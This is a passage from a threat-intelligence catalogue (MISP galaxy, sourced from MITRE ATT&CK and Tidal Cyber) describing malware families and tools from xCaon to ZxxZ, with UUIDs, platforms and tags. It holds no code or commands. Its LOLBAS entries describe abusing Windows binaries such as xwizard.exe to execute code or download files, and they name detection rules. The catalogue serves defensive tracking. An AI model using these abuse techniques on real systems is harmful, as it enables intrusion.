software_attack_id | S0341 |
source | MITRE |
type | ['malware'] |
xCaon
xCaon is an HTTP variant of the BoxCaon malware family that has used by IndigoZebra since at least 2014. xCaon has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.[Checkpoint IndigoZebra July 2021][Securelist APT Trends Q2 2017]
Internal MISP references
UUID 11a0dff4-1dc8-4553-8a38-90a07b01bfcd
which can be used as unique global reference for xCaon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0653 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
xCmd
xCmd is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems. [xCmd]
Internal MISP references
UUID d943d3d9-3a99-464f-94f0-95aa7963d858
which can be used as unique global reference for xCmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0123 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
xcopy
xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the xcopy
command "creates files with the archive attribute set, whether or not this attribute was set in the source file".[xcopy Microsoft]
Internal MISP references
UUID 84954209-1e2a-48dd-ba17-0f015f6de3ef
which can be used as unique global reference for xcopy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5019 |
source | Tidal Cyber |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
XCSSET
XCSSET is a macOS modular backdoor that targets Xcode application developers. XCSSET was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.[trendmicro xcsset xcode project 2020]
Internal MISP references
UUID 3672ecfa-20bf-4d69-948d-876be343563f
which can be used as unique global reference for XCSSET
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0658 |
source | MITRE |
tags | ['4a457eb3-e404-47e5-b349-8b1f743dc657', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Xloader (macOS Variant)
Researchers discovered an updated macOS variant of the XLoader stealer/botnet malware, which is programmed in C and Objective C and signed with an Apple developer signature.[SentinelOne 8 21 2023]
Internal MISP references
UUID 5ced31ef-8e03-4125-be9b-922dac49bfa2
which can be used as unique global reference for Xloader (macOS Variant)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5317 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
XMRig
XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, "XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active".[U.S. CISA Trends June 30 2020]
Internal MISP references
UUID 1491c020-6449-48e7-8ebf-abf7b71fbc97
which can be used as unique global reference for XMRig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5064 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '291c006e-f77a-4c9c-ae7e-084974c0e1eb', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Xpack
According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, "custom .NET loader that decrypts (AES), loads, and executes accompanying files".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 19e7e967-7d0a-4930-8ef9-11a43dcb081d
which can be used as unique global reference for Xpack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5048 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
XTunnel
XTunnel a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by APT28 during the compromise of the Democratic National Committee. [Crowdstrike DNC June 2016] [Invincea XTunnel] [ESET Sednit Part 2]
Internal MISP references
UUID 133136f0-7254-4cec-8710-0ab99d5da4e5
which can be used as unique global reference for XTunnel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0117 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Xwizard
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\xwizard.exe * C:\Windows\SysWOW64\xwizard.exe
Resources: * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ * https://www.youtube.com/watch?v=LwDHX7DVHWU * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ * https://twitter.com/notwhickey/status/1306023056847110144
Detection: * Sigma: proc_creation_win_lolbin_class_exec_xwizard.yml * Sigma: proc_creation_win_lolbin_dll_sideload_xwizard.yml * Elastic: execution_com_object_xwizard.toml * Elastic: defense_evasion_unusual_process_network_connection.toml[Xwizard.exe - LOLBAS Project]
Internal MISP references
UUID d5663ff2-904b-42d6-b4d8-672017d91de2
which can be used as unique global reference for Xwizard
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5181 |
source | Tidal Cyber |
tags | ['c37d2f5f-91da-43c6-869e-192bf0e0ae90', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Xworm
XWorm is a Remote Access Trojan (RAT)/Backdoor malware.
Internal MISP references
UUID 15a19d45-8f31-4ee4-ba01-0c8c1f24a67b
which can be used as unique global reference for Xworm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5290 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
YAHOYAH
YAHOYAH is a Trojan used by Tropic Trooper as a second-stage backdoor.[TrendMicro TropicTrooper 2015]
Internal MISP references
UUID 0844bc42-5c29-47c3-b1b3-6bfffbf1732a
which can be used as unique global reference for YAHOYAH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0388 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
YouieLoad
YouieLoad is an intermediate-stage malware used by the North Korean threat actor Moonstone Sleet mainly for payload execution purposes. It is also capable of performing system reconnaissance.[Microsoft Security Blog 5 28 2024]
Internal MISP references
UUID 2992159c-d71c-48cf-8302-020f90332390
which can be used as unique global reference for YouieLoad
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5323 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
yty
yty is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. [ASERT Donot March 2018]
Internal MISP references
UUID e0962ff7-5524-4683-9b95-0e4ba07dccb2
which can be used as unique global reference for yty
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0248 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Zebrocy
Zebrocy is a Trojan that has been used by APT28 since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. [Palo Alto Sofacy 06-2018][Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018][CISA Zebrocy Oct 2020]
Internal MISP references
UUID e317b8a6-1722-4017-be33-717a5a93ef1c
which can be used as unique global reference for Zebrocy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0251 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zeroaccess
Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain. [Sophos ZeroAccess]
Internal MISP references
UUID 2f52b513-5293-4833-9c4d-b120e7a84341
which can be used as unique global reference for Zeroaccess
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0027 |
source | MITRE |
type | ['malware'] |
ZeroT
ZeroT is a Trojan used by TA459, often in conjunction with PlugX. [Proofpoint TA459 April 2017] [Proofpoint ZeroT Feb 2017]
Internal MISP references
UUID f51df90e-ea1b-4eeb-9aff-ec5abf4a5dfd
which can be used as unique global reference for ZeroT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0230 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zeus Panda
Zeus Panda is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. Zeus Panda’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.[Talos Zeus Panda Nov 2017][GDATA Zeus Panda June 2017]
Internal MISP references
UUID be8add13-40d7-495e-91eb-258d3a4711bc
which can be used as unique global reference for Zeus Panda
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0330 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Zipfldr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Compressed Folder library
Author: LOLBAS Team
Paths: * c:\windows\system32\zipfldr.dll * c:\windows\syswow64\zipfldr.dll
Resources: * https://twitter.com/moriarty_meng/status/977848311603380224 * https://twitter.com/bohops/status/997896811904929792 * https://windows10dll.nirsoft.net/zipfldr_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Zipfldr.dll - LOLBAS Project]
Internal MISP references
UUID 34d0c5b5-f6e1-41e9-9061-cf9d36fe61c8
which can be used as unique global reference for Zipfldr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5201 |
source | Tidal Cyber |
tags | ['0d0098b4-e159-4502-973d-714011ba605f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ZIPLINE
ZIPLINE is a passive backdoor that was used during Cutting Edge on compromised Secure Connect VPNs for reverse shell and proxy functionality.[Mandiant Cutting Edge January 2024]
Internal MISP references
UUID 976a7797-3008-5316-9e28-19c9a05959d0
which can be used as unique global reference for ZIPLINE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1114 |
source | MITRE |
type | ['malware'] |
ZLib
ZLib is a full-featured backdoor that was used as a second-stage implant during Operation Dust Storm since at least 2014. ZLib is malware and should not be confused with the legitimate compression library from which its name is derived.[Cylance Dust Storm]
Internal MISP references
UUID 1ac8d363-2903-43da-9c1d-2b28179638c8
which can be used as unique global reference for ZLib
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0086 |
source | MITRE |
type | ['malware'] |
Zloader
Zloader originated in 2016 as a modular banking trojan based on the popular Zeus malware. It has evolved in the years since to be used as an important distribution mechanism for various other malware, including ransomware.[WeLiveSecurity April 19 2022]
This object represents a collection of MITRE ATT&CK® Techniques associated with Zloader binaries. Techniques used by various actors to distribute Zloader can be found in the separate "Zloader Threat Actors" Group object.
Internal MISP references
UUID a106fb66-bd68-40cc-9374-8b59234a0cec
which can be used as unique global reference for Zloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5312 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '39357cc1-dbb1-49e4-9fe0-ff24032b94d5', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zox
Zox is a remote access tool that has been used by Axiom since at least 2008.[Novetta-Axiom]
Internal MISP references
UUID 75dd9acb-fcff-4b0b-b45b-f943fb589d78
which can be used as unique global reference for Zox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0672 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
zwShell
zwShell is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during Night Dragon.[McAfee Night Dragon]
Internal MISP references
UUID 49314d4e-dc04-456f-918e-a3bedfc3192a
which can be used as unique global reference for zwShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0350 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
ZxShell
ZxShell is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.[FireEye APT41 Aug 2019][Talos ZxShell Oct 2014]
Internal MISP references
UUID eea89ff2-036d-4fa6-bbed-f89502c62318
which can be used as unique global reference for ZxShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0412 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ZxxZ
ZxxZ is a trojan written in Visual C++ that has been used by BITTER since at least August 2021, including against Bangladeshi government personnel.[Cisco Talos Bitter Bangladesh May 2022]
Internal MISP references
UUID 91e1ee26-d6ae-4203-a466-93c9e5019b47
which can be used as unique global reference for ZxxZ
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1013 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.